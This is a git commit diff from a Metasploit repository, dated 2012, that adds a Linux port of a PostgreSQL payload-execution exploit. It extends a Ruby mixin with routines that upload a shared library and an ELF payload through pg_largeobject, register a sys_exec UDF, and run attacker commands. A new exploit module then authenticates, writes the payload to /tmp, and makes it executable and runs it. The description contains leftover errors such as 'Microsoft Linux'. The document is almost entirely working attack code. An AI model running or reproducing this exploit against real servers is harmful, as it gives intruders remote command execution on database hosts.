Added linux port for postgres payload

bug/bundler_fix
midnitesnake 2012-08-14 17:46:35 +01:00
parent 0a6e0b2415
commit ad2b457fda
8 changed files with 271 additions and 5 deletions

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -1,4 +1,3 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf
@ -12,6 +11,7 @@ module Msf
module Exploit::Remote::Postgres
require 'postgres_msf'
require 'base64'
include Msf::Db::PostgresPR
attr_accessor :postgres_conn
@ -264,7 +264,7 @@ module Exploit::Remote::Postgres
read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
COPY #{temp_table_name} FROM '#{filename}';
SELECT * FROM #{temp_table_name}}
read_return = postgres_query(read_query)
read_return = postgres_query(read_query,true)
end
def postgres_has_database_privilege(priv)
@ -288,16 +288,47 @@ module Exploit::Remote::Postgres
return true
end
# Creates the function sys_exec() in the pg_temp schema.
def postgres_create_sys_exec_linux(so)
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{so}', 'sys_exec' language C returns null on null input immutable"
resp = postgres_query(q);
if resp[:sql_error]
print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
return false
end
return true
end
# This presumes the pg_temp.sys_exec() udf has been installed, almost
# certainly by postgres_create_sys_exec()
def postgres_sys_exec(cmd)
print_status "Attempting to Execute: #{cmd}"
q = "select pg_temp.sys_exec('#{cmd}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error "SQL Bomb #{resp[:sql_error]}"
return false
end
return true
end
# Takes a local filename and uploads it into a table as a Base64 encoded string.
# Returns an array if successful, false if not.
def postgres_upload_binary_file_linux(fname)
data = postgres_base64_file(fname)
tbl,fld = postgres_create_stager_table
return false unless data && tbl && fld
q = "insert into #{tbl}(#{fld}) values('#{data}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error resp[:sql_error]
return false
end
return true
oid, fout = postgres_write_data_to_disk_linux(tbl,fld)
return false unless oid && fout
return [tbl,fld,fout,oid]
end
# Takes a local filename and uploads it into a table as a Base64 encoded string.
@ -317,6 +348,65 @@ module Exploit::Remote::Postgres
return [tbl,fld,fout,oid]
end
def postgres_upload_binary_file_elf(fname)
data = Base64.encode64(fname)
tbl,fld = postgres_create_stager_table
return false unless data && tbl && fld
q = "insert into #{tbl}(#{fld}) values('#{data}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error resp[:sql_error]
return false
end
oid, fout = postgres_write_data_to_disk_elf(tbl,fld)
return false unless oid && fout
return [tbl,fld,fout,oid]
end
# Writes b64 data from a table field, decoded, to disk.
def postgres_write_data_to_disk_elf(tbl,fld)
oid = rand(60000) + 1000
fname = "/tmp/" + Rex::Text::rand_text_alpha(8)
queries = [
"select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{fname}')"
]
queries.each do |q|
resp = postgres_query(q)
if resp && resp[:sql_error]
print_error "Could not write the library to disk."
print_error resp[:sql_error]
break
end
end
return oid,fname
end
# Writes b64 data from a table field, decoded, to disk.
def postgres_write_data_to_disk_linux(tbl,fld)
oid = rand(60000) + 1000
fname = "/tmp/" + Rex::Text::rand_text_alpha(8) + ".so"
queries = [
"select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{fname}')"
]
queries.each do |q|
resp = postgres_query(q)
if resp && resp[:sql_error]
print_error "Could not write the library to disk."
print_error resp[:sql_error]
break
end
end
return oid,fname
end
# Writes b64 data from a table field, decoded, to disk.
def postgres_write_data_to_disk(tbl,fld)
oid = rand(60000) + 1000
@ -343,6 +433,12 @@ module Exploit::Remote::Postgres
[data].pack("m*").gsub(/\r?\n/,"")
end
def postgres_base64_elf(data)
#data = File.open(fname, "rb") {|f| f.read f.stat.size}
[data].pack("m*").gsub(/\r?\n/,"")
end
# Creates a temporary table to store base64'ed binary data in.
def postgres_create_stager_table
tbl = Rex::Text.rand_text_alpha(8).downcase

View File

@ -0,0 +1,170 @@
###
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Postgres
# Creates an instance of this module.
def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL for Microsoft Linux Payload Execution',
'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the
target host via the UPDATE pg_largeobject method of binary injection. On
default Microsoft Linux installations of PostgreSQL (=< 8.4), the postgres
service account may write to the Windows temp directory, and may source
UDF Shared Libraries's from there as well.
PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on are valid targets for this module.
NOTE: This module will leave a payload executable on the target system when the
attack is finished, as well as the UDF SO and the OID.
},
'Author' =>
[
'todb' # this Metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf',
'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' # A litte more specific to PostgreSQL
]
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 0x65535,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl',
}
},
'Targets' =>
[
[ 'Automatic', { } ], # Confirmed on XXX
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper.
))
register_options(
[
OptString.new('BITS',[true,'32/ 64 bit OS',32])
],self.class)
deregister_options('SQL', 'RETURN_ROWSET')
end
# Buncha stuff to make typing easier.
def username; datastore['USERNAME']; end
def password; datastore['PASSWORD']; end
def database; datastore['DATABASE']; end
def verbose; datastore['VERBOSE']; end
def rhost; datastore['RHOST']; end
def rport; datastore['RPORT']; end
def bits; datastore['BITS'];end
def execute_command(cmd, opts)
postgres_sys_exec(cmd)
end
def exploit
version = get_version(username,password,database,verbose)
case version
when :nocompat; print_error "Authentication successful, but not a compatable version."
when :noauth; print_error "Authentication failed."
when :noconn; print_error "Connection failed."
end
return unless version =~ /8\.[234]/
print_status "Authentication successful and vulnerable version #{version} on Linux confirmed."
tbl,fld,so,oid = postgres_upload_binary_file_linux(so_fname(version))
unless tbl && fld && so && oid
print_error "Could not upload the UDF SO"
return
end
print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})"
ret_sys_exec = postgres_create_sys_exec_linux(so)
if ret_sys_exec
if @postgres_conn
print_status "Success"
tbl,fld,myexploit,oid = postgres_upload_binary_file_elf("#!/bin/sh\n" + payload.encode)
unless tbl && fld && myexploit && oid
print_error "Could not upload the PAYLOAD"
return
end
print_status "Uploaded #{myexploit} as OID #{oid} to table #{tbl}(#{fld})"
postgres_sys_exec("chmod 755 #{myexploit}")
postgres_sys_exec("#{myexploit}")
handler
postgres_logout if @postgres_conn
else
print_error "Lost connection."
return
end
end
postgres_logout if @postgres_conn
end
def so_fname(version)
print_status "Using #{version}/#{bits}/lib_postgresqludf_sys.so"
File.join(Msf::Config.install_root,"data","exploits","postgres",version,bits,"lib_postgresqludf_sys.so")
end
# A shorter version of do_fingerprint from the postgres_version scanner
# module, specifically looking for versions that valid targets for this
# module.
def get_version(user=nil,pass=nil,database=nil,verbose=false)
begin
msg = "#{rhost}:#{rport} Postgres -"
password = pass || postgres_password
vprint_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'")
result = postgres_fingerprint(
:db => database,
:username => user,
:password => password
)
if result[:auth]
# So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4
# This also checks to see if it was compiled with a windows-based compiler --
# the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw)
# Also, the method to write files to disk doesn't appear to work on 9.0, so
# tabling that version for now.
#if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C\+\+|mingw|cygwin)/i
if result[:auth] =~ /PostgreSQL (8\.[234]).*/i
return $1
else
print_status "Found #{result[:auth]}"
return :nocompat
end
else
return :noauth
end
rescue Rex::ConnectionError
vprint_error "#{rhost}:#{rport} Connection Error: #{$!}"
return :noconn
end
end
end